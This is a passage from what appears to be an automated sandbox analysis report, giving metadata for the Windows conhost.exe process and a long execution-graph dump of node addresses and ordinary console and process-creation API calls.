                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:22
                                                                                                                                                                      Start time:07:22:30
                                                                                                                                                                      Start date:27/11/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff6ee680000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Disassembly

                                                                                                                                                                      Reset < >

                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:5.4%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                        Signature Coverage:30.6%
                                                                                                                                                                        Total number of Nodes:638
                                                                                                                                                                        Total number of Limit Nodes:23
                                                                                                                                                                        execution_graph 16719 7ff6e9438d80 16720 7ff6e9438da4 16719->16720 16721 7ff6e9438db6 16720->16721 16722 7ff6e9438dbf Sleep 16720->16722 16723 7ff6e9438ddb _amsg_exit 16721->16723 16725 7ff6e9438de7 16721->16725 16722->16720 16723->16725 16724 7ff6e9438e56 _initterm 16727 7ff6e9438e73 _IsNonwritableInCurrentImage 16724->16727 16725->16724 16726 7ff6e9438e3c 16725->16726 16725->16727 16733 7ff6e94337d8 GetCurrentThreadId OpenThread 16727->16733 16766 7ff6e94304f4 16733->16766 16735 7ff6e9433839 HeapSetInformation RegOpenKeyExW 16736 7ff6e943e9f8 RegQueryValueExW RegCloseKey 16735->16736 16737 7ff6e943388d 16735->16737 16739 7ff6e943ea41 GetThreadLocale 16736->16739 16738 7ff6e9435920 VirtualQuery VirtualQuery 16737->16738 16740 7ff6e94338ab GetConsoleOutputCP GetCPInfo 16738->16740 16742 7ff6e9433919 16739->16742 16740->16739 16741 7ff6e94338f1 memset 16740->16741 16741->16742 16742->16736 16743 7ff6e9434d5c 391 API calls 16742->16743 16744 7ff6e9433948 _setjmp 16742->16744 16745 7ff6e943eb27 _setjmp 16742->16745 16746 7ff6e9434c1c 166 API calls 16742->16746 16747 7ff6e9448530 370 API calls 16742->16747 16748 7ff6e9423240 166 API calls 16742->16748 16749 7ff6e94301b8 6 API calls 16742->16749 16750 7ff6e943eb71 _setmode 16742->16750 16751 7ff6e94386f0 182 API calls 16742->16751 16752 7ff6e9430580 12 API calls 16742->16752 16754 7ff6e94358e4 EnterCriticalSection LeaveCriticalSection 16742->16754 16756 7ff6e942be00 647 API calls 16742->16756 16757 7ff6e942df60 481 API calls 16742->16757 16758 7ff6e94358e4 EnterCriticalSection LeaveCriticalSection 16742->16758 16743->16742 16744->16742 16745->16742 16746->16742 16747->16742 16748->16742 16749->16742 16750->16742 16751->16742 16753 7ff6e943398b GetConsoleOutputCP GetCPInfo 16752->16753 16755 7ff6e94304f4 GetModuleHandleW GetProcAddress SetThreadLocale 16753->16755 16754->16742 16755->16742 16756->16742 16757->16742 16759 7ff6e943ebbe GetConsoleOutputCP GetCPInfo 16758->16759 16760 7ff6e94304f4 GetModuleHandleW GetProcAddress SetThreadLocale 16759->16760 16761 7ff6e943ebe6 16760->16761 16762 7ff6e942be00 647 API calls 16761->16762 16763 7ff6e9430580 12 API calls 16761->16763 16762->16761 16764 7ff6e943ebfc GetConsoleOutputCP GetCPInfo 16763->16764 16765 7ff6e94304f4 GetModuleHandleW GetProcAddress SetThreadLocale 16764->16765 16765->16742 16768 7ff6e9430504 16766->16768 16767 7ff6e943051e GetModuleHandleW 16767->16768 16768->16767 16769 7ff6e943054d GetProcAddress 16768->16769 16770 7ff6e943056c SetThreadLocale 16768->16770 16769->16768 22176 7ff6e94299d0 22179 7ff6e94299f0 22176->22179 22180 7ff6e943b7df 22179->22180 22181 7ff6e9429a1b 22179->22181 22182 7ff6e942cd90 166 API calls 22181->22182 22183 7ff6e9429a25 22182->22183 22183->22180 22184 7ff6e9429a31 wcschr 22183->22184 22185 7ff6e9429a4e 22184->22185 22186 7ff6e943b7be 22184->22186 22216 7ff6e942df60 22185->22216 22191 7ff6e942cd90 166 API calls 22186->22191 22189 7ff6e9429a79 22192 7ff6e943b888 22189->22192 22194 7ff6e9429ae2 22189->22194 22196 7ff6e9429a9b 22189->22196 22190 7ff6e943b824 22190->22180 22193 7ff6e942b900 166 API calls 22190->22193 22206 7ff6e943b7d7 22191->22206 22200 7ff6e9423278 166 API calls 22192->22200 22195 7ff6e943b839 22193->22195 22198 7ff6e9429aeb wcschr 22194->22198 22199 7ff6e9429b01 22194->22199 22195->22180 22197 7ff6e943b841 _wcsupr 22195->22197 22196->22192 22201 7ff6e9429aa8 22196->22201 22202 7ff6e943b85f 22197->22202 22198->22199 22203 7ff6e9429b37 22198->22203 22204 7ff6e9429b0a wcschr 22199->22204 22205 7ff6e9429b20 22199->22205 22200->22180 22236 7ff6e94296e8 22201->22236 22211 7ff6e943b876 22202->22211 22212 7ff6e943b863 wcscmp 22202->22212 22260 7ff6e942c620 GetConsoleTitleW 22203->22260 22204->22203 22204->22205 22209 7ff6e9430a6c 273 API calls 22205->22209 22206->22180 22206->22206 22214 7ff6e942b6b0 170 API calls 22206->22214 22213 7ff6e9429b2e 22209->22213 22210 7ff6e94299dd 22215 7ff6e9423278 166 API calls 22211->22215 22212->22180 22212->22211 22213->22201 22213->22203 22214->22190 22215->22180 22217 7ff6e942dfe2 22216->22217 22218 7ff6e942df93 22216->22218 22220 7ff6e942e100 VirtualFree 22217->22220 22221 7ff6e942e00b _setjmp 22217->22221 22218->22217 22219 7ff6e942df9f GetProcessHeap RtlFreeHeap 22218->22219 22219->22217 22219->22218 22220->22217 22222 7ff6e9429a67 22221->22222 22223 7ff6e942e04a 22221->22223 22222->22189 22222->22190 22224 7ff6e942e600 473 API calls 22223->22224 22225 7ff6e942e073 22224->22225 22226 7ff6e942e0e0 longjmp 22225->22226 22227 7ff6e942e081 22225->22227 22235 7ff6e942e0b0 22226->22235 22228 7ff6e942d250 475 API calls 22227->22228 22229 7ff6e942e086 22228->22229 22232 7ff6e942e600 473 API calls 22229->22232 22229->22235 22233 7ff6e942e0a7 22232->22233 22234 7ff6e944d610 167 API calls 22233->22234 22233->22235 22234->22235 22235->22222 22304 7ff6e944d3fc 22235->22304 22237 7ff6e9429737 22236->22237 22239 7ff6e942cd90 166 API calls 22237->22239 22240 7ff6e942977d memset 22237->22240 22242 7ff6e943b76e 22237->22242 22243 7ff6e943b7b3 22237->22243 22245 7ff6e943b79a 22237->22245 22247 7ff6e942b364 17 API calls 22237->22247 22254 7ff6e94296b4 186 API calls 22237->22254 22255 7ff6e942986d 22237->22255 22352 7ff6e9431fac memset 22237->22352 22379 7ff6e942ce10 22237->22379 22429 7ff6e9435920 22237->22429 22239->22237 22241 7ff6e942ca40 17 API calls 22240->22241 22241->22237 22244 7ff6e9423278 166 API calls 22242->22244 22246 7ff6e943b787 22244->22246 22248 7ff6e943855c ??_V@YAXPEAX 22245->22248 22249 7ff6e943b795 22246->22249 22250 7ff6e944e944 393 API calls 22246->22250 22247->22237 22248->22243 22435 7ff6e9447694 22249->22435 22250->22249 22254->22237 22256 7ff6e942988c 22255->22256 22257 7ff6e9429880 ??_V@YAXPEAX 22255->22257 22258 7ff6e9438f80 7 API calls 22256->22258 22257->22256 22259 7ff6e942989d 22258->22259 22259->22210 22262 7ff6e942c675 22260->22262 22267 7ff6e942ca2f 22260->22267 22261 7ff6e943c5fc GetLastError 22261->22267 22263 7ff6e942ca40 17 API calls 22262->22263 22273 7ff6e942c69b 22263->22273 22264 7ff6e9423278 166 API calls 22264->22267 22265 7ff6e943855c ??_V@YAXPEAX 22265->22267 22266 7ff6e943291c 8 API calls 22290 7ff6e942c762 22266->22290 22267->22261 22267->22264 22267->22265 22268 7ff6e942c9b5 22272 7ff6e943855c ??_V@YAXPEAX 22268->22272 22269 7ff6e94289c0 23 API calls 22296 7ff6e942c964 22269->22296 22270 7ff6e942c978 towupper 22270->22296 22271 7ff6e943855c ??_V@YAXPEAX 22271->22290 22291 7ff6e942c855 22272->22291 22273->22267 22273->22268 22274 7ff6e942d3f0 223 API calls 22273->22274 22273->22290 22277 7ff6e942c741 22274->22277 22275 7ff6e942c872 22280 7ff6e943855c ??_V@YAXPEAX 22275->22280 22276 7ff6e944ec14 173 API calls 22276->22290 22279 7ff6e942c74d 22277->22279 22282 7ff6e942c8b5 wcsncmp 22277->22282 22278 7ff6e943c6b8 SetConsoleTitleW 22278->22275 22283 7ff6e942bd38 207 API calls 22279->22283 22279->22290 22281 7ff6e942c87c 22280->22281 22284 7ff6e9438f80 7 API calls 22281->22284 22282->22279 22282->22290 22283->22290 22286 7ff6e942c88e 22284->22286 22285 7ff6e942c83d 22287 7ff6e942cb40 166 API calls 22285->22287 22286->22210 22289 7ff6e942c848 22287->22289 22288 7ff6e942c78a wcschr 22288->22290 22289->22291 22293 7ff6e942cad4 172 API calls 22289->22293 22290->22266 22290->22267 22290->22271 22290->22285 22290->22288 22292 7ff6e942ca25 22290->22292 22294 7ff6e943c684 22290->22294 22290->22296 22298 7ff6e942ca2a 22290->22298 22291->22275 22291->22278 22295 7ff6e9423278 166 API calls 22292->22295 22293->22291 22297 7ff6e9423278 166 API calls 22294->22297 22295->22267 22296->22261 22296->22268 22296->22269 22296->22270 22296->22276 22296->22290 22300 7ff6e942ca16 GetLastError 22296->22300 22297->22267 22299 7ff6e9439158 7 API calls 22298->22299 22299->22267 22302 7ff6e9423278 166 API calls 22300->22302 22303 7ff6e943c675 22302->22303 22303->22267 22305 7ff6e944d419 22304->22305 22306 7ff6e9433448 166 API calls 22305->22306 22307 7ff6e944d592 22305->22307 22309 7ff6e944d5c4 22305->22309 22310 7ff6e944d541 22305->22310 22318 7ff6e943cadf 22305->22318 22320 7ff6e944d3fc 166 API calls 22305->22320 22321 7ff6e944d555 22305->22321 22306->22305 22308 7ff6e9433448 166 API calls 22307->22308 22313 7ff6e944d5a5 22308->22313 22311 7ff6e9433448 166 API calls 22309->22311 22310->22307 22310->22309 22317 7ff6e944d546 22310->22317 22319 7ff6e944d589 22310->22319 22311->22318 22314 7ff6e944d5ba 22313->22314 22315 7ff6e9433448 166 API calls 22313->22315 22322 7ff6e944d36c 22314->22322 22315->22314 22317->22309 22317->22321 22319->22307 22319->22321 22320->22305 22329 7ff6e944d31c 22321->22329 22323 7ff6e944d3d8 22322->22323 22324 7ff6e944d381 22322->22324 22325 7ff6e94334a0 166 API calls 22324->22325 22328 7ff6e944d390 22325->22328 22326 7ff6e9433448 166 API calls 22326->22328 22327 7ff6e94334a0 166 API calls 22327->22328 22328->22323 22328->22326 22328->22327 22328->22328 22330 7ff6e9433448 166 API calls 22329->22330 22331 7ff6e944d33b 22330->22331 22332 7ff6e944d36c 166 API calls 22331->22332 22333 7ff6e944d343 22332->22333 22334 7ff6e944d3fc 166 API calls 22333->22334 22351 7ff6e944d34e 22334->22351 22335 7ff6e944d5c2 22335->22318 22336 7ff6e944d592 22337 7ff6e9433448 166 API calls 22336->22337 22342 7ff6e944d5a5 22337->22342 22338 7ff6e944d5c4 22340 7ff6e9433448 166 API calls 22338->22340 22339 7ff6e9433448 166 API calls 22339->22351 22340->22335 22341 7ff6e944d31c 166 API calls 22341->22335 22344 7ff6e944d5ba 22342->22344 22345 7ff6e9433448 166 API calls 22342->22345 22343 7ff6e944d546 22343->22338 22348 7ff6e944d555 22343->22348 22346 7ff6e944d36c 166 API calls 22344->22346 22345->22344 22346->22335 22347 7ff6e944d541 22347->22336 22347->22338 22347->22343 22349 7ff6e944d589 22347->22349 22348->22341 22349->22336 22349->22348 22350 7ff6e944d3fc 166 API calls 22350->22351 22351->22335 22351->22336 22351->22338 22351->22339 22351->22347 22351->22348 22351->22350 22353 7ff6e943203b 22352->22353 22354 7ff6e94320b0 22353->22354 22355 7ff6e9432094 22353->22355 22356 7ff6e9433060 171 API calls 22354->22356 22358 7ff6e943211c 22354->22358 22357 7ff6e94320a6 22355->22357 22359 7ff6e9423278 166 API calls 22355->22359 22356->22358 22361 7ff6e9438f80 7 API calls 22357->22361 22358->22357 22360 7ff6e9432e44 2 API calls 22358->22360 22359->22357 22363 7ff6e9432148 22360->22363 22362 7ff6e9432325 22361->22362 22362->22237 22363->22357 22364 7ff6e9432d70 3 API calls 22363->22364 22365 7ff6e94321af 22364->22365 22366 7ff6e942b900 166 API calls 22365->22366 22368 7ff6e94321d0 22366->22368 22367 7ff6e943e04a ??_V@YAXPEAX 22367->22357 22368->22367 22369 7ff6e943221c wcsspn 22368->22369 22378 7ff6e94322a4 ??_V@YAXPEAX 22368->22378 22370 7ff6e942b900 166 API calls 22369->22370 22372 7ff6e943223b 22370->22372 22372->22367 22375 7ff6e9432252 22372->22375 22373 7ff6e942d3f0 223 API calls 22373->22378 22374 7ff6e943e06d wcschr 22374->22375 22375->22374 22376 7ff6e943e090 towupper 22375->22376 22377 7ff6e943228f 22375->22377 22376->22375 22376->22377 22377->22373 22378->22357 22417 7ff6e942d0f8 22379->22417 22425 7ff6e942ce5b 22379->22425 22380 7ff6e9438f80 7 API calls 22383 7ff6e942d10a 22380->22383 22381 7ff6e943c860 22382 7ff6e943c97c 22381->22382 22384 7ff6e944ee88 390 API calls 22381->22384 22385 7ff6e944e9b4 197 API calls 22382->22385 22383->22237 22387 7ff6e943c879 22384->22387 22388 7ff6e943c981 longjmp 22385->22388 22386 7ff6e9430494 182 API calls 22386->22425 22389 7ff6e943c95c 22387->22389 22390 7ff6e943c882 EnterCriticalSection LeaveCriticalSection 22387->22390 22391 7ff6e943c99a 22388->22391 22389->22382 22396 7ff6e94296b4 186 API calls 22389->22396 22395 7ff6e942d0e3 22390->22395 22393 7ff6e943c9b3 ??_V@YAXPEAX 22391->22393 22391->22417 22392 7ff6e942df60 481 API calls 22394 7ff6e942ceaa _tell 22392->22394 22393->22417 22397 7ff6e942d208 _close 22394->22397 22395->22237 22396->22389 22397->22425 22398 7ff6e942cd90 166 API calls 22398->22425 22399 7ff6e943c9d5 22400 7ff6e944d610 167 API calls 22399->22400 22402 7ff6e943c9da 22400->22402 22401 7ff6e942b900 166 API calls 22401->22425 22403 7ff6e943ca07 22402->22403 22405 7ff6e944bfec 176 API calls 22402->22405 22404 7ff6e944e91c 198 API calls 22403->22404 22409 7ff6e943ca0c 22404->22409 22406 7ff6e943c9f1 22405->22406 22407 7ff6e9423240 166 API calls 22406->22407 22407->22403 22408 7ff6e942cf33 memset 22408->22425 22409->22237 22410 7ff6e942ca40 17 API calls 22410->22425 22411 7ff6e942d184 wcschr 22411->22425 22412 7ff6e944bfec 176 API calls 22412->22425 22413 7ff6e943c9c9 22415 7ff6e943855c ??_V@YAXPEAX 22413->22415 22414 7ff6e942d1a7 wcschr 22414->22425 22415->22417 22416 7ff6e944778c 166 API calls 22416->22425 22417->22380 22418 7ff6e9430a6c 273 API calls 22418->22425 22420 7ff6e9433448 166 API calls 22420->22425 22421 7ff6e942cfab _wcsicmp 22421->22425 22422 7ff6e9430580 12 API calls 22423 7ff6e942d003 GetConsoleOutputCP GetCPInfo 22422->22423 22424 7ff6e94304f4 3 API calls 22423->22424 22424->22425 22425->22381 22425->22386 22425->22391 22425->22392 22425->22395 22425->22398 22425->22399 22425->22401 22425->22408 22425->22410 22425->22411 22425->22412 22425->22413 22425->22414 22425->22416 22425->22417 22425->22418 22425->22420 22425->22421 22425->22422 22427 7ff6e9431fac 238 API calls 22425->22427 22428 7ff6e942d044 ??_V@YAXPEAX 22425->22428 22441 7ff6e942be00 22425->22441 22475 7ff6e944c738 22425->22475 22427->22425 22428->22425 22430 7ff6e943596c 22429->22430 22434 7ff6e9435a12 22429->22434 22431 7ff6e943598d VirtualQuery 22430->22431 22430->22434 22433 7ff6e94359ad 22431->22433 22431->22434 22432 7ff6e94359b7 VirtualQuery 22432->22433 22432->22434 22433->22432 22433->22434 22434->22237 22436 7ff6e94476a3 22435->22436 22437 7ff6e94476b7 22436->22437 22438 7ff6e94296b4 186 API calls 22436->22438 22439 7ff6e944e9b4 197 API calls 22437->22439 22438->22436 22440 7ff6e94476bc longjmp 22439->22440 22442 7ff6e942bec8 22441->22442 22443 7ff6e942be1b 22441->22443 22442->22425 22443->22442 22444 7ff6e942be47 memset 22443->22444 22445 7ff6e942be67 22443->22445 22514 7ff6e942bff0 22444->22514 22447 7ff6e942be73 22445->22447 22448 7ff6e942bf29 22445->22448 22451 7ff6e942beaf 22445->22451 22449 7ff6e942be92 22447->22449 22453 7ff6e942bf0c 22447->22453 22450 7ff6e942cd90 166 API calls 22448->22450 22454 7ff6e942c620 243 API calls 22449->22454 22458 7ff6e942bea1 22449->22458 22452 7ff6e942bf33 22450->22452 22451->22442 22455 7ff6e942bff0 185 API calls 22451->22455 22452->22451 22459 7ff6e942bf70 22452->22459 22462 7ff6e94288a8 _wcsicmp 22452->22462 22552 7ff6e942b0d8 memset 22453->22552 22454->22458 22455->22442 22458->22451 22465 7ff6e942af98 2 API calls 22458->22465 22469 7ff6e942bf75 22459->22469 22612 7ff6e94271ec 22459->22612 22460 7ff6e942bf1e 22460->22451 22464 7ff6e942bf5a 22462->22464 22463 7ff6e942bfa9 22463->22451 22466 7ff6e942cd90 166 API calls 22463->22466 22464->22459 22467 7ff6e9430a6c 273 API calls 22464->22467 22465->22451 22468 7ff6e942bfbb 22466->22468 22467->22459 22468->22451 22470 7ff6e943081c 166 API calls 22468->22470 22471 7ff6e942b0d8 194 API calls 22469->22471 22470->22469 22472 7ff6e942bf7f 22471->22472 22472->22451 22485 7ff6e9435ad8 22472->22485 22476 7ff6e944c775 22475->22476 22481 7ff6e944c7ab 22475->22481 22477 7ff6e942cd90 166 API calls 22476->22477 22479 7ff6e944c781 22477->22479 22478 7ff6e944c8d4 22478->22425 22479->22478 22480 7ff6e942b0d8 194 API calls 22479->22480 22480->22478 22481->22478 22481->22479 22482 7ff6e942b6b0 170 API calls 22481->22482 22483 7ff6e942b038 _dup2 22481->22483 22484 7ff6e942d208 _close 22481->22484 22482->22481 22483->22481 22484->22481 22486 7ff6e942cd90 166 API calls 22485->22486 22487 7ff6e9435b12 22486->22487 22513 7ff6e9435b8b 22487->22513 22618 7ff6e942cb40 22487->22618 22489 7ff6e9438f80 7 API calls 22491 7ff6e942bf99 22489->22491 22491->22458 22492 7ff6e9430a6c 273 API calls 22493 7ff6e9435b43 22492->22493 22494 7ff6e9435bb8 22493->22494 22495 7ff6e9435b48 GetConsoleTitleW 22493->22495 22497 7ff6e9435bbd GetConsoleTitleW 22494->22497 22498 7ff6e9435bf4 22494->22498 22622 7ff6e942cad4 22495->22622 22501 7ff6e942cad4 172 API calls 22497->22501 22500 7ff6e943f452 22498->22500 22504 7ff6e9435bfd 22498->22504 22505 7ff6e9433c24 166 API calls 22500->22505 22502 7ff6e9435bdb 22501->22502 22506 7ff6e94296e8 645 API calls 22502->22506 22508 7ff6e9435c1b 22504->22508 22509 7ff6e943f462 22504->22509 22504->22513 22505->22513 22507 7ff6e9435b7f 22506->22507 22512 7ff6e9435c3c SetConsoleTitleW 22507->22512 22510 7ff6e9423278 166 API calls 22508->22510 22511 7ff6e9423278 166 API calls 22509->22511 22510->22513 22511->22513 22512->22513 22513->22489 22515 7ff6e942c01c 22514->22515 22516 7ff6e942c0c4 22514->22516 22517 7ff6e942c086 22515->22517 22518 7ff6e942c022 22515->22518 22516->22445 22522 7ff6e942c144 22517->22522 22533 7ff6e942c094 22517->22533 22519 7ff6e942c030 22518->22519 22520 7ff6e942c113 22518->22520 22521 7ff6e942c039 wcschr 22519->22521 22535 7ff6e942c053 22519->22535 22531 7ff6e942ff70 2 API calls 22520->22531 22520->22535 22523 7ff6e942c301 22521->22523 22521->22535 22526 7ff6e942c151 22522->22526 22541 7ff6e942c1c8 22522->22541 22530 7ff6e942cd90 166 API calls 22523->22530 22524 7ff6e942c058 22536 7ff6e942ff70 2 API calls 22524->22536 22539 7ff6e942c073 22524->22539 22525 7ff6e942c0c6 22529 7ff6e942c0cf wcschr 22525->22529 22525->22539 22709 7ff6e942c460 22526->22709 22528 7ff6e942c460 183 API calls 22528->22533 22534 7ff6e942c1be 22529->22534 22529->22539 22551 7ff6e942c30b 22530->22551 22531->22535 22533->22516 22533->22528 22537 7ff6e942cd90 166 API calls 22534->22537 22535->22524 22535->22525 22543 7ff6e942c211 22535->22543 22536->22539 22537->22541 22538 7ff6e942c460 183 API calls 22538->22516 22539->22516 22540 7ff6e942c460 183 API calls 22539->22540 22540->22539 22541->22516 22542 7ff6e942c285 22541->22542 22541->22543 22548 7ff6e942d840 178 API calls 22541->22548 22542->22543 22547 7ff6e942b6b0 170 API calls 22542->22547 22544 7ff6e942ff70 2 API calls 22543->22544 22544->22516 22545 7ff6e942d840 178 API calls 22545->22551 22546 7ff6e942b6b0 170 API calls 22546->22535 22549 7ff6e942c2ac 22547->22549 22548->22541 22549->22539 22549->22543 22550 7ff6e942c3d4 22550->22539 22550->22543 22550->22546 22551->22516 22551->22543 22551->22545 22551->22550 22553 7ff6e942ca40 17 API calls 22552->22553 22568 7ff6e942b162 22553->22568 22554 7ff6e942b2f7 ??_V@YAXPEAX 22555 7ff6e942b303 22554->22555 22557 7ff6e9438f80 7 API calls 22555->22557 22556 7ff6e942b1d9 22560 7ff6e942cd90 166 API calls 22556->22560 22575 7ff6e942b1ed 22556->22575 22559 7ff6e942b315 22557->22559 22558 7ff6e9431ea0 8 API calls 22558->22568 22559->22449 22559->22460 22560->22575 22562 7ff6e943bfef _get_osfhandle SetFilePointer 22565 7ff6e943c01d 22562->22565 22562->22575 22563 7ff6e942b228 _get_osfhandle 22564 7ff6e942b23f _get_osfhandle 22563->22564 22563->22575 22564->22575 22567 7ff6e94333f0 _vsnwprintf 22565->22567 22570 7ff6e943c038 22567->22570 22568->22556 22568->22558 22568->22568 22583 7ff6e942b2e1 22568->22583 22569 7ff6e94301b8 6 API calls 22569->22575 22574 7ff6e9423278 166 API calls 22570->22574 22571 7ff6e94333f0 _vsnwprintf 22571->22570 22572 7ff6e942d208 _close 22572->22575 22573 7ff6e94326e0 19 API calls 22573->22575 22576 7ff6e943c1f9 22574->22576 22575->22562 22575->22563 22575->22569 22575->22572 22575->22573 22578 7ff6e942b038 _dup2 22575->22578 22579 7ff6e943c060 22575->22579 22580 7ff6e943c246 22575->22580 22581 7ff6e943c1a5 22575->22581 22575->22583 22587 7ff6e942b356 22575->22587 22600 7ff6e943c1c3 22575->22600 22723 7ff6e942affc _dup 22575->22723 22725 7ff6e944f318 _get_osfhandle GetFileType 22575->22725 22577 7ff6e942af98 2 API calls 22576->22577 22577->22583 22578->22575 22579->22580 22585 7ff6e94309f4 2 API calls 22579->22585 22582 7ff6e942af98 2 API calls 22580->22582 22584 7ff6e942b038 _dup2 22581->22584 22586 7ff6e943c24b 22582->22586 22583->22554 22583->22555 22588 7ff6e943c1b7 22584->22588 22589 7ff6e943c084 22585->22589 22590 7ff6e944f1d8 166 API calls 22586->22590 22596 7ff6e942af98 2 API calls 22587->22596 22591 7ff6e943c207 22588->22591 22592 7ff6e943c1be 22588->22592 22593 7ff6e942b900 166 API calls 22589->22593 22590->22583 22595 7ff6e942d208 _close 22591->22595 22597 7ff6e942d208 _close 22592->22597 22594 7ff6e943c08c 22593->22594 22598 7ff6e943c094 wcsrchr 22594->22598 22611 7ff6e943c0ad 22594->22611 22595->22587 22599 7ff6e943c211 22596->22599 22597->22600 22598->22611 22601 7ff6e94333f0 _vsnwprintf 22599->22601 22600->22571 22602 7ff6e943c22c 22601->22602 22603 7ff6e9423278 166 API calls 22602->22603 22603->22583 22604 7ff6e943c106 22605 7ff6e942ff70 2 API calls 22604->22605 22607 7ff6e943c13b 22605->22607 22606 7ff6e943c0e0 _wcsnicmp 22606->22611 22607->22580 22608 7ff6e943c146 SearchPathW 22607->22608 22608->22580 22609 7ff6e943c188 22608->22609 22610 7ff6e94326e0 19 API calls 22609->22610 22610->22581 22611->22604 22611->22606 22613 7ff6e9427279 22612->22613 22615 7ff6e9427211 _setjmp 22612->22615 22613->22463 22615->22613 22616 7ff6e9427265 22615->22616 22726 7ff6e94272b0 22616->22726 22619 7ff6e942cb63 22618->22619 22620 7ff6e942cd90 166 API calls 22619->22620 22621 7ff6e942cb99 22620->22621 22621->22492 22621->22513 22623 7ff6e942cad9 22622->22623 22624 7ff6e942cb05 22622->22624 22623->22624 22625 7ff6e942cd90 166 API calls 22623->22625 22634 7ff6e9434224 InitializeProcThreadAttributeList 22624->22634 22626 7ff6e943c722 22625->22626 22626->22624 22627 7ff6e943c72e GetConsoleTitleW 22626->22627 22627->22624 22628 7ff6e943c74a 22627->22628 22629 7ff6e942b6b0 170 API calls 22628->22629 22633 7ff6e943c778 22629->22633 22630 7ff6e943c7ec 22631 7ff6e942ff70 2 API calls 22630->22631 22631->22624 22632 7ff6e943c7dd SetConsoleTitleW 22632->22630 22633->22630 22633->22632 22635 7ff6e94342ab UpdateProcThreadAttribute 22634->22635 22636 7ff6e943ecd4 GetLastError 22634->22636 22637 7ff6e94342eb memset memset GetStartupInfoW 22635->22637 22638 7ff6e943ecf0 GetLastError 22635->22638 22639 7ff6e943ecee 22636->22639 22641 7ff6e9433a90 170 API calls 22637->22641 22707 7ff6e9449eec 22638->22707 22643 7ff6e94343a8 22641->22643 22644 7ff6e942b900 166 API calls 22643->22644 22645 7ff6e94343bb 22644->22645 22646 7ff6e9434638 _local_unwind 22645->22646 22647 7ff6e94343cc 22645->22647 22646->22647 22648 7ff6e94343de wcsrchr 22647->22648 22649 7ff6e9434415 22647->22649 22648->22649 22650 7ff6e94343f7 lstrcmpW 22648->22650 22694 7ff6e9435a68 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 22649->22694 22650->22649 22652 7ff6e9434668 22650->22652 22695 7ff6e9449044 22652->22695 22653 7ff6e943441a 22655 7ff6e943442a CreateProcessW 22653->22655 22657 7ff6e9434596 CreateProcessAsUserW 22653->22657 22656 7ff6e943448b 22655->22656 22658 7ff6e9434495 CloseHandle 22656->22658 22659 7ff6e9434672 GetLastError 22656->22659 22657->22656 22660 7ff6e943498c 8 API calls 22658->22660 22664 7ff6e943468d 22659->22664 22661 7ff6e94344c5 22660->22661 22662 7ff6e94344cd 22661->22662 22661->22664 22663 7ff6e94347a3 22662->22663 22681 7ff6e944a250 33 API calls 22662->22681 22685 7ff6e94344f8 22662->22685 22663->22507 22664->22662 22665 7ff6e942cd90 166 API calls 22664->22665 22666 7ff6e9434724 22665->22666 22669 7ff6e943472c _local_unwind 22666->22669 22674 7ff6e943473d 22666->22674 22667 7ff6e9435cb4 7 API calls 22671 7ff6e9434517 22667->22671 22668 7ff6e943461c 22672 7ff6e942ff70 GetProcessHeap RtlFreeHeap 22668->22672 22669->22674 22670 7ff6e94347e1 CloseHandle 22670->22668 22673 7ff6e94333f0 _vsnwprintf 22671->22673 22675 7ff6e94347fa DeleteProcThreadAttributeList 22672->22675 22676 7ff6e9434544 22673->22676 22682 7ff6e942ff70 GetProcessHeap RtlFreeHeap 22674->22682 22677 7ff6e9438f80 7 API calls 22675->22677 22678 7ff6e943498c 8 API calls 22676->22678 22679 7ff6e9434820 22677->22679 22680 7ff6e9434558 22678->22680 22679->22507 22683 7ff6e94347ae 22680->22683 22684 7ff6e9434564 22680->22684 22681->22685 22687 7ff6e943475b _local_unwind 22682->22687 22686 7ff6e94333f0 _vsnwprintf 22683->22686 22688 7ff6e943498c 8 API calls 22684->22688 22685->22663 22685->22667 22690 7ff6e9434612 22685->22690 22686->22690 22687->22662 22689 7ff6e9434577 22688->22689 22689->22668 22691 7ff6e943457f 22689->22691 22690->22668 22690->22670 22692 7ff6e944a920 210 API calls 22691->22692 22693 7ff6e9434584 22692->22693 22693->22668 22696 7ff6e9433a90 170 API calls 22695->22696 22697 7ff6e9449064 22696->22697 22698 7ff6e944906e 22697->22698 22700 7ff6e9449083 22697->22700 22699 7ff6e943498c 8 API calls 22698->22699 22701 7ff6e9449081 22699->22701 22702 7ff6e942cd90 166 API calls 22700->22702 22701->22649 22703 7ff6e944909b 22702->22703 22703->22701 22704 7ff6e943498c 8 API calls 22703->22704 22705 7ff6e94490ec 22704->22705 22706 7ff6e942ff70 2 API calls 22705->22706 22706->22701 22708 7ff6e943ed0a DeleteProcThreadAttributeList 22707->22708 22708->22639 22710 7ff6e942c4c9 22709->22710 22711 7ff6e942c486 22709->22711 22715 7ff6e942ff70 2 API calls 22710->22715 22716 7ff6e942c161 22710->22716 22712 7ff6e942c48e wcschr 22711->22712 22711->22716 22713 7ff6e942c4ef 22712->22713 22712->22716 22714 7ff6e942cd90 166 API calls 22713->22714 22722 7ff6e942c4f9 22714->22722 22715->22716 22716->22516 22716->22538 22717 7ff6e942c5bd 22718 7ff6e942c541 22717->22718 22720 7ff6e942b6b0 170 API calls 22717->22720 22718->22716 22719 7ff6e942ff70 2 API calls 22718->22719 22719->22716 22720->22718 22721 7ff6e942d840 178 API calls 22721->22722 22722->22716 22722->22717 22722->22718 22722->22721 22722->22722 22724 7ff6e942b018 22723->22724 22724->22575 22725->22575 22727 7ff6e9444621 22726->22727 22728 7ff6e94272de 22726->22728 22732 7ff6e944447b longjmp 22727->22732 22733 7ff6e9444639 22727->22733 22750 7ff6e94447e0 22727->22750 22753 7ff6e944475e 22727->22753 22729 7ff6e94272eb 22728->22729 22737 7ff6e9444467 22728->22737 22738 7ff6e9444530 22728->22738 22787 7ff6e9427348 22729->22787 22731 7ff6e9427348 168 API calls 22736 7ff6e9444524 22731->22736 